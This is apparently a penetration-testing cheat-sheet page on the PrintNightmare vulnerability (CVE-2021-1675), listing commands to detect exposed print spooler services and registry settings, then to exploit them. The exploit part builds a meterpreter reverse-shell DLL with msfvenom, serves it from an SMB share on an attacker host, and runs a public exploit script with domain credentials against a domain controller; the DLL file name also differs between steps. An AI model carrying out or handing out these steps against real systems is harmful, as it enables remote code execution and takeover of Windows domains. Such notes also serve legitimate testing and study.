Skip to content

đŸ‘ģ PrintNightmare

https://github.com/cube0x0/CVE-2021-1675

Identify


 rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1

Exploit


You need bros version of impacket

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
Generate DLL payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8080 -f dll > timsync.dll
Host payload on smbserver
sudo smbserver.py -smb2support ITShare share
Start listener, execute payload
sudo python3 CVE-2021-1675.py domain.local/user:'password'@<dcip> '\\<attackhost>\ITShare\timesync.dll'